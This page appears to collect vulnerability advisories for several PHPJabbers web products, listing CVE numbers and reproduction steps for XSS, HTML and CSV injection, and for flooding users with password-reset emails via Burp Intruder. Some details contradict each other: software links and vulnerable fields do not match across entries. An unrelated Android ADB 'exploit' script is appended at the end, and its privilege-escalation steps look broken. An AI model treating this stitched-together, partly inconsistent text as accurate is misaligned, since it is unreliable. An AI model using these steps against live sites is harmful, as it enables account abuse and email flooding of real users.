<pre><code># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple HTML Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51303<br /><br />Descriptions:<br />PHPJabbers Event Ticketing System v1.0 is vulnerable to Multiple HTML<br />Injection. HTML injection, also known as HTML code injection or<br />cross-site scripting (XSS), is a web security vulnerability that<br />allows an attacker to inject malicious code into a web page that is<br />then viewed by other users. This can lead to various attacks, such as<br />stealing sensitive information, session hijacking, defacement of<br />websites, or delivering malware to users.<br /><br />Parameters: "lid, name, plugin_sms_api_key, plugin_sms_country_code,<br />title, plugin_sms_api_key, title".<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51303)<br /><br /><br /><br /><br /># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51306<br /><br />Descriptions:<br />PHPJabbers Event Ticketing System v1.0 is vulnerable to Multiple<br />Stored Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "name, title".<br />3. Go to System Users then click Add User.<br />4. Then use any XSS Payload in "Name" input field and Save.<br />5. You will see xss popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51306)<br /><br /><br /><br /># Exploit Title: PHPJabbers Event Ticketing System v1.0 - Reflected XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51337<br /><br />Descriptions:<br />Reflected cross-site scripting (XSS) vulnerability exists in index<br />page "lid" parameter of PHPJabbers Event Ticketing System v1.0 that<br />allows attackers to execute arbitrary web scripts or HTML via a<br />crafted payload injected into the Website login page parameter.<br /><br />Steps to Reproduce:<br />1. Visit main url<br />2. Now use XSS Payload in "lid" parameter.<br />3. You will see xss popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51337)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51334<br /><br />Descriptions:<br />A lack of rate limiting in the "Login Section, Forgot Email" feature<br />of PHPJabbers Cinema Booking System v1.0 allows attackers to send an<br />excessive amount of reset requests for a legitimate user, leading to a<br />possible Denial of Service (DoS) via a large amount of generated<br />e-mail messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704804809_816/index.php?controller=pjAdmin&action=pjActionIndex<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51334)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51333<br /><br />Descriptions:<br />PHPJabbers Cinema Booking System v1.0 is vulnerable to CSV injection<br />vulnerability which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51333)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51332<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Meeting Room Booking System v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704805602_793/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51332)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51331<br /><br />Descriptions:<br />PHPJabbers Cleaning Business Software v1.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51331)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cinema Booking System v1.0 - Reflected Cross-Site Scripting<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51330<br /><br /><br />Descriptions:<br />Reflected cross-site scripting (XSS) vulnerability exists in<br />Reservations menu, Schedule section and "date" parameter of PHPJabbers<br />Cinema Booking System v1.0 that allows attackers to execute arbitrary<br />web scripts or HTML via a crafted payload injected into the Website<br />login page parameter.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Now Showing menu then click Print.<br />3. Now use XSS Payload in "date" parameter.<br />4. You will see xss popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51330)<br /><br /><br /># Exploit Title: PHPJabbers Cinema Booking System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51335<br /><br />Descriptions:<br />PHPJabbers Cinema Booking System v1.0 is vulnerable to Multiple Stored<br />Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "title, name".<br />3. Go to System Users Menu then click add user.<br />4. Then use any XSS Payload in "Name" input field and Save.<br />5. You will see xss popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51335)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - Multiple<br />Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51328<br /><br />Descriptions:<br />PHPJabbers Cleaning Business Software v1.0 is vulnerable to Multiple<br />Stored Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "c_name, name".<br />3. Go to System Users Menu then click add user.<br />4. Then use any XSS Payload in "Name" input field and Save.<br />5. You will see xss popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51328)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51326<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Cleaning Business Software v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704803403_514/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51326)<br /><br /><br /><br /># Exploit Title: PHPJabbers Cleaning Business Software v1.0 - Missing Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51327<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Cleaning Business Software v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/{*}/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51327)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 -<br />Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51325<br /><br />Descriptions:<br />PHPJabbers Shared Asset Booking System v1.0 is vulnerable to Multiple<br />Stored Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "title, name".<br />3. Go to System Users Menu then add user.<br />4. Then use any XSS Payload in "Name" input field and Save.<br />5. You will see xss popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51325)<br /></code></pre>
<pre><code>#!/usr/bin/env python<br /><br />import subprocess<br /><br /># Connect to the device via ADB<br />subprocess.run(["adb", "devices"])<br /><br /># Check if the device is in secure USB mode<br />device = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE)<br />if "1" in device.stdout.decode():<br /> # Secure USB mode is enabled, so we need to disable it<br /> subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"])<br /><br /># Exploit the vulnerability by accessing ADB before SUW completion<br />subprocess.run(["adb", "shell"])<br /><br /># Escalate privileges by executing commands as the root user<br />subprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True)<br />subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)<br /></code></pre>